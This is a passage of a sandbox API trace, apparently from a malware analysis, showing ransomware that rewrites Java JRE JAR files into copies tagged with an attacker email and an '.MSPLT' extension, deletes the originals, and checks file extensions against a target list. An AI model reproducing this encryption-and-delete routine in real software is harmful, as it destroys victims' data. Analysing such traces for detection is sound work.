lpNewFilePointer=0x0) returned 1 [0303.273] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f4 [0303.274] GetLastError () returned 0x0 [0303.274] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x205e, lpOverlapped=0x0) returned 1 [0303.278] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x2060, lpOverlapped=0x0) returned 1 [0303.279] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.280] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xe6, lpOverlapped=0x0) returned 1 [0303.280] SetEndOfFile (hFile=0x4f4) returned 1 [0303.280] CloseHandle (hObject=0x4f4) returned 1 [0303.284] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.284] SetEndOfFile (hFile=0x4f0) returned 1 [0303.335] CloseHandle (hObject=0x4f0) returned 1 [0303.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0303.336] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar")) returned 1 [0303.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.337] lstrlenW (lpString=".doc") returned 4 [0303.337] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.337] lstrlenW (lpString=".docx") returned 5 [0303.338] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0303.338] lstrlenW (lpString=".pdf") returned 4 [0303.338] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.338] lstrlenW (lpString=".xls") returned 4 [0303.338] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.338] lstrlenW (lpString=".xlsx") returned 5 [0303.338] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0303.338] lstrlenW (lpString=".ppt") returned 4 [0303.338] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.338] lstrlenW (lpString=".zip") returned 4 [0303.338] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.338] lstrlenW (lpString=".rar") returned 4 [0303.338] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.338] lstrlenW (lpString=".bz2") returned 4 [0303.338] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.338] lstrlenW (lpString=".7z") returned 3 [0303.338] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.338] lstrlenW (lpString=".dbf") returned 4 [0303.338] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.338] lstrlenW (lpString=".1cd") returned 4 [0303.338] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.339] lstrlenW (lpString=".jpg") returned 4 [0303.339] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.339] lstrlenW (lpString=".doc") returned 4 [0303.339] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.339] lstrlenW (lpString=".docx") returned 5 [0303.339] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0303.339] lstrlenW (lpString=".pdf") returned 4 [0303.339] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.339] lstrlenW (lpString=".xls") returned 4 [0303.339] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.339] lstrlenW (lpString=".xlsx") returned 5 [0303.339] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0303.339] lstrlenW (lpString=".ppt") returned 4 [0303.339] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.339] lstrlenW (lpString=".zip") returned 4 [0303.339] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.341] lstrlenW (lpString=".rar") returned 4 [0303.341] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.341] lstrlenW (lpString=".bz2") returned 4 [0303.341] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.341] lstrlenW (lpString=".7z") returned 3 [0303.341] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.341] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.341] lstrlenW (lpString=".dbf") returned 4 [0303.341] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.341] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.342] lstrlenW (lpString=".1cd") returned 4 [0303.342] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.342] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 52 [0303.342] lstrlenW (lpString=".jpg") returned 4 [0303.342] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.342] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.342] lstrlenW (lpString="jaccess.jar") returned 11 [0303.342] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.345] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=44516) returned 1 [0303.345] CloseHandle (hObject=0x4f0) returned 1 [0303.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar")) returned 0x20 [0303.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.345] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.346] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.346] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.346] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f4 [0303.348] GetLastError () returned 0x0 [0303.348] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xade4, lpOverlapped=0x0) returned 1 [0303.780] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xadf0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xadf0, lpOverlapped=0x0) returned 1 [0303.782] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.782] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xea, lpOverlapped=0x0) returned 1 [0303.782] SetEndOfFile (hFile=0x4f4) returned 1 [0303.782] CloseHandle (hObject=0x4f4) returned 1 [0303.792] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.792] SetEndOfFile (hFile=0x4f0) returned 1 [0303.798] CloseHandle (hObject=0x4f0) returned 1 [0303.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0303.801] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar")) returned 1 [0303.801] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.802] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.802] lstrlenW (lpString=".doc") returned 4 [0303.802] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.802] lstrlenW (lpString=".docx") returned 5 [0303.802] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0303.802] lstrlenW (lpString=".pdf") returned 4 [0303.802] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.802] lstrlenW (lpString=".xls") returned 4 [0303.802] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.802] lstrlenW (lpString=".xlsx") returned 5 [0303.802] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0303.802] lstrlenW (lpString=".ppt") returned 4 [0303.802] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.802] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.802] lstrlenW (lpString=".zip") returned 4 [0303.802] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.802] lstrlenW (lpString=".rar") returned 4 [0303.802] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.802] lstrlenW (lpString=".bz2") returned 4 [0303.802] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.802] lstrlenW (lpString=".7z") returned 3 [0303.802] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.802] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.802] lstrlenW (lpString=".dbf") returned 4 [0303.802] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.802] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.802] lstrlenW (lpString=".1cd") returned 4 [0303.803] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.803] lstrlenW (lpString=".jpg") returned 4 [0303.803] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.803] lstrlenW (lpString=".doc") returned 4 [0303.803] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.803] lstrlenW (lpString=".docx") returned 5 [0303.803] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0303.803] lstrlenW (lpString=".pdf") returned 4 [0303.803] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString=".xls") returned 4 [0303.803] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString=".xlsx") returned 5 [0303.803] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0303.803] lstrlenW (lpString=".ppt") returned 4 [0303.803] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.803] lstrlenW (lpString=".zip") returned 4 [0303.803] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString=".rar") returned 4 [0303.803] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.803] lstrlenW (lpString=".bz2") returned 4 [0303.804] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.804] lstrlenW (lpString=".7z") returned 3 [0303.804] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.804] lstrlenW (lpString=".dbf") returned 4 [0303.804] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.804] lstrlenW (lpString=".1cd") returned 4 [0303.804] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 54 [0303.804] lstrlenW (lpString=".jpg") returned 4 [0303.804] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.804] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.804] lstrlenW (lpString="sunmscapi.jar") returned 13 [0303.804] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.805] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=32699) returned 1 [0303.805] CloseHandle (hObject=0x4f0) returned 1 [0303.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar")) returned 0x20 [0303.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.806] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0303.806] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.806] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.806] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f4 [0303.807] GetLastError () returned 0x0 [0303.807] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x7fbb, lpOverlapped=0x0) returned 1 [0303.817] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x7fc0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x7fc0, lpOverlapped=0x0) returned 1 [0303.819] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.819] WriteFile (in: hFile=0x4f4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xee, lpOverlapped=0x0) returned 1 [0303.819] SetEndOfFile (hFile=0x4f4) returned 1 [0303.819] CloseHandle (hObject=0x4f4) returned 1 [0303.821] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.821] SetEndOfFile (hFile=0x4f0) returned 1 [0304.008] CloseHandle (hObject=0x4f0) returned 1 [0304.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0304.009] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar")) returned 1 [0304.010] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.010] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.010] lstrlenW (lpString=".doc") returned 4 [0304.010] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0304.010] lstrlenW (lpString=".docx") returned 5 [0304.010] lstrcmpiW (lpString1=".docx", lpString2="i.jar") returned -1 [0304.010] lstrlenW (lpString=".pdf") returned 4 [0304.010] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0304.010] lstrlenW (lpString=".xls") returned 4 [0304.010] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0304.010] lstrlenW (lpString=".xlsx") returned 5 [0304.010] lstrcmpiW (lpString1=".xlsx", lpString2="i.jar") returned -1 [0304.010] lstrlenW (lpString=".ppt") returned 4 [0304.010] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0304.010] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString=".zip") returned 4 [0304.011] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0304.011] lstrlenW (lpString=".rar") returned 4 [0304.011] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0304.011] lstrlenW (lpString=".bz2") returned 4 [0304.011] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0304.011] lstrlenW (lpString=".7z") returned 3 [0304.011] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0304.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString=".dbf") returned 4 [0304.011] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0304.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString=".1cd") returned 4 [0304.011] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0304.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString=".jpg") returned 4 [0304.011] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0304.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.011] lstrlenW (lpString=".doc") returned 4 [0304.011] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0304.012] lstrlenW (lpString=".docx") returned 5 [0304.012] lstrcmpiW (lpString1=".docx", lpString2="i.jar") returned -1 [0304.012] lstrlenW (lpString=".pdf") returned 4 [0304.012] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0304.012] lstrlenW (lpString=".xls") returned 4 [0304.012] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0304.012] lstrlenW (lpString=".xlsx") returned 5 [0304.012] lstrcmpiW (lpString1=".xlsx", lpString2="i.jar") returned -1 [0304.012] lstrlenW (lpString=".ppt") returned 4 [0304.012] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0304.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.012] lstrlenW (lpString=".zip") returned 4 [0304.012] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0304.012] lstrlenW (lpString=".rar") returned 4 [0304.013] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0304.013] lstrlenW (lpString=".bz2") returned 4 [0304.013] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0304.013] lstrlenW (lpString=".7z") returned 3 [0304.013] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0304.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.013] lstrlenW (lpString=".dbf") returned 4 [0304.013] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0304.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.013] lstrlenW (lpString=".1cd") returned 4 [0304.013] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0304.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 56 [0304.013] lstrlenW (lpString=".jpg") returned 4 [0304.013] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0304.014] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0304.014] lstrlenW (lpString="zipfs.jar") returned 9 [0304.014] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0304.015] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=68924) returned 1 [0304.015] CloseHandle (hObject=0x4f0) returned 1 [0304.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar")) returned 0x20 [0304.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0304.021] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f0 [0304.021] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0304.021] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0304.021] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x518 [0304.022] GetLastError () returned 0x0 [0304.022] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x10d3c, lpOverlapped=0x0) returned 1 [0304.085] WriteFile (in: hFile=0x518, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x10d40, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, 